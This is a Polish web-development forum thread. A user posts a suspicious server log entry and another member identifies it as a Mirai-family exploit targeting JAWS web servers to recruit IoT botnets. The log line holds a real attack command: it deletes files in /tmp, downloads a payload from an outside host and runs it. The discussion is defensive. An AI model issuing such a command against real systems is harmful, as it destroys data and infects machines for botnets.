Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

> Co to może zrobić ?
phpamator
post
Post #1





Grupa: Zarejestrowani
Postów: 328
Pomógł: 3
Dołączył: 10.07.2016
Skąd: UK-raine

Ostrzeżenie: (0%)
-----

Hel-lo wszystkim

Jeśli macie a pewnie niektórzy maja z pewnościa ..

co to może być ?

GET /shell?cd+/tmp;rm+-rf+*;wget+ kreekxassa.ml/jaws;sh+/tmp/jaws" 400 0 "-" "-"

wyglada na formę ataku ale moje doświadczenie w temacie "server security" jest stosunkowo niewielkie.
Faktem jest, że po tym mój serwer przez kilk aminut był całkowicie martwy ....

Macie jakieś wytłumaczenie ?

Pozdrówka
phpamator


Ten post edytował phpamator 11.07.2022, 09:18:54
Go to the top of the page
+Quote Post
 
 Start new topic
Odpowiedzi
gino
post
Post #2





Grupa: Zarejestrowani
Postów: 324
Pomógł: 52
Dołączył: 18.02.2008

Ostrzeżenie: (0%)
-----

Podpytałem trochę naszych adminów bo już gdzieś mi się podobny link obił o oczy. To działanie exploitów oparte na kodzie Mirai, który w w Twoim przypadku chce dokonać nieautoryzowanego polecenia powłoki przez serwer Webserwer JAWS. Generalnie ataki tych exploitów (i pochodnych Mirai) zostały stworzone pierwotnie do ataków na IOT (internet rzeczy) w celu zainfekowania ich jak najwięcej ( w sensie np. ruterów czy serwerów sprzętowych) i utworzenia z nich sieci zdalnych botnetów do ataków na dużą skalę.
Pochodne Mirai niestety ciągle ewaluowują i np. któraś wersja Mirai wykorzystuje exploita Spring4Shell do infekowania podatnych serwerów internetowych i rekrutowania ich do ataków DDoS. Jest tego syfu znacznie więcej, tworząc kampanie i zestawy exploitów: Omni, Okai, Hakane itp.
Warto o tym poczytać.
Go to the top of the page
+Quote Post

Posty w temacie
- phpamator   Co to może zrobić ?   11.07.2022, 09:16:55
- - nospor   wyglada na to ze twoja strona ma routing o nazwie ...   11.07.2022, 09:52:26
- - ohm   Próba wykonania komend systemowych przez skrypt ...   11.07.2022, 17:53:49
- - gino   Podpytałem trochę naszych adminów bo już gdzieś mi...   15.07.2022, 19:50:37
- - StrefaPi   ale tu nie ma co się przejmować zapytanie według t...   17.07.2022, 07:06:15
- - gino   Jak dostaniesz ileśtam tysięcy takich wywołań w kr...   17.07.2022, 07:50:37
- - StrefaPi   fail2ban?   17.07.2022, 09:16:12
- - gino   fail2ban nie chroni przed atakami brutal force roz...   17.07.2022, 18:22:58

« Następny starszy · Hydepark · Następny nowszy »
 

Reply to this topicStart new topic
2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 

Tryb wyświetlania: Przełącz na: Standardowy · Przełącz na: Linearny+ · Drzewo

Śledź ten temat · Wyślij temat na e-mail · Wydrukuj ten temat · Subskrybuj to forum

RSS Aktualny czas: 13.10.2025 - 23:54
Powered By IP.Board © 2025  IPS, Inc.
All changes by PHP.pl Administrators
Hosting zapewnia NQ.pl hosting, trac, svn